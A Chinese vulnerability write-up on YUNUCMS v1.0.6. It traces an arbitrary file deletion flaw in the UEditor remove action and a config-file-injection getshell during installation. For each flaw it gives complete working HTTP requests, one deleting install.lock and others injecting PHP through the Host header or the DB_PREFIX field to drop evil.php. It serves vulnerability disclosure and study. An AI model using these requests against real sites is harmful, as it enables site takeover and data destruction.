除了小蜗牛,我蛙还带来了YUNUCMSv1.0.6
任意文件删除漏洞
0x00 相关环境
源码信息:YUNUCMSv1.0.6 问题文件: YUNUCMSv1.0.6staticsueditorphpvendorLocal.class.php 漏洞类型:任意文件删除漏洞 站点地址:http://www.yunucms.com/
0x01 漏洞分析
在文件YUNUCMSv1.0.6staticsueditorphpvendorLocal.class.php的第34-57行中发现如下代码块,remove方法中使用POST接收key参数的值然后进行路径拼接再传入unlink函数中,未进行任何安全处理,存在任意文件删除漏洞。
追溯remove方法被调用的过程,在YUNUCMSv1.0.6staticsueditorphpcontroller.php文件中发现如下代码块,根据注释可知是实例化处理的方法的代码。
继续追溯dispatcher方法,在YUNUCMSv1.0.6staticsueditorphpvendorChannel.class.php文件的第33-40行中发现如下代码块,使用call_user_func函数回调对应的方法。
在YUNUCMSv1.0.6staticsueditorphpcontroller.php文件的24-39行中,使用如下代码进行函数和方法的注册,并包含相应的class文件,具体包含了:Channel.class.php,Local.class.php,Base.class.php这3个文件,而remove方法就在Local.class.php文件中,因此可以使用这个入口调用remove方法。
0x02 漏洞复现
该漏洞可以进行任意文件删除,如下通过删除install.lock文件为例子进行说明,通过删除install.lock可以进行源码重装,此处为了方便查看引入的class文件在YUNUCMSv1.0.6staticsueditorphpcontroller.php文件的第30行中加入如下代码。
使用如下请求可以删除install.lock文件,从而可以进行源码重装。
POST /statics/ueditor/php/controller.php?action=remove HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/statics/ueditor/dialogs/attachment/attachment.html
Content-Length: 22
Connection: close
key=/data/install.lock
配置文件写入导致GetShell
0x00 相关环境
源码信息: YUNUCMSv1.0.6 问题文件: YUNUCMSv1.0.6appindexcontrollerInstall.php 漏洞类型:配置文件写入导致GetShell 站点地址:http://www.yunucms.com/
0x01 漏洞分析
在YUNUCMSv1.0.6appindexcontrollerInstall.php的第126-127行中使用$_SERVER['HTTP_HOST']接收http请求中的host字段的值,然后传入到setConfigfile方法中。
在YUNUCMSv1.0.6appindexcontrollerInstall.php的第96-105行中也是存在类似的问题。
跟入setConfigfile方法,在YUNUCMSv1.0.6appadmincommon.php文件的第467-474行中得到如下代码块,使用了file_put_contents将传入的参数进行拆分并写入相应的文件。
因此YUNUCMSv1.0.6appindexcontrollerInstall.php的第126-127行中使用$_SERVER['HTTP_HOST']将会被写入到sys.php文件中,YUNUCMSv1.0.6appindexcontrollerInstall.php的第96-105行的数据会被写入到database.php文件中,但是传入的参数是数据库的一些配置文件,所以要修改成PHP代码有一点的限制,但是也是可行的,如在DB_PREFIX位置上写入PHP代码。
0x02 漏洞复现
情况一:通过修改host字段的值将PHP代码写入到sys.php文件中.
1.修改请求中的host字段的值为PHP代码。
POST /index.php/index/install/setup3 HTTP/1.1
Host: ',].die(fwrite(fopen("evil.php", "w"), "<?php phpinfo();?>"));$a=['a'=>'
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Referer: http://127.0.0.1/index.php/index/install/setup2
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
DB_HOST=127.0.0.1&DB_PORT=3306&DB_NAME=yunucms&DB_USER=root&DB_PWD=root&DB_PREFIX=yunu_
2.提交后sys.php文件内容被修改成如下内容。
3.访问sys.php文件,便会生成evil.php文件 。 http://127.0.0.1/config/extra/sys.php
4.访问evil文件可以看到执行的PHP代码 。 http://127.0.0.1/config/extra/evil.php
情况二:通过修改DB_PREFIX参数的值将PHP代码写入到database.php文件中。
1.修改请求中的DB_PREFIX参数的值为PHP代码提交。
POST /index.php/index/install/setup3 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
Referer: http://127.0.0.1/index.php/index/install/setup2
Connection: close
Upgrade-Insecure-Requests: 1
DB_HOST=127.0.0.1&DB_PORT=3306&DB_NAME=yunucms&DB_USER=root&DB_PWD=root&DB_PREFIX=yunu_',].die(fwrite(fopen("evil.php", "w"), "<?php phpinfo();?>"));$a=['a'=>'
2.提交后POST请求后database.php文件中的内容被修改成如下代码。
3.提交后访问database.php文件便会生成evil.php的文件 。 http://127.0.0.1/config/database.php
4.访问evil.php可以看到执行的PHP代码。
- OpenAI发布高度优化的GPU计算内核—块稀疏GPU内核
- SQL SERVER 原来还可以这样玩 FOR XML PATH
- 零基础学编程011:复利数据表问题(总结)
- 一个小程序引发的思考
- 深入内核:DUMP Block的数据读取与脏数据写入影响
- 零基础学编程010:最终可以输出完整的复利数据表了
- 在C#使用文件监控对象FileSystemWatcher 实现数据同步
- 零基础学编程018:条件语句
- 零基础学编程022:函数的世界
- 帝国cms如何调用指定id的文章到首页?
- C 语言 static、extern与指针函数介绍
- 2017最流行的十大Python库
- 笔记:mysql升序排列asc,降序排列desc
- 检测端口是否被占用
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 关于mysql的join
- 微信公众号接入智能聊天机器人
- SAP UI5 Diagnostics工具里一个使用面向切片编程(AOP)的一个例子
- SAP CDS view自学教程之九:cube view和query view的实现原理
- 一点多发FTP客户端设计
- VS2017中使用CppSQLite报出编译器错误C2440
- Windows 必知命令
- MATLAB批量读取一个文件夹下的图片
- python next()迭代器完成会引发StopIteration异常
- 没想到,Git居然有3种“后悔药”!
- JetCache埋点的骚操作,不服不行啊
- StringBuider 在什么条件下、如何使用效率更高?
- SpringCache与redis集成,优雅的缓存解决方案
- 理解一下5种IO模型、阻塞IO和非阻塞IO、同步IO和异步IO
- WinXP的MS08-067漏洞利用复现和解决方案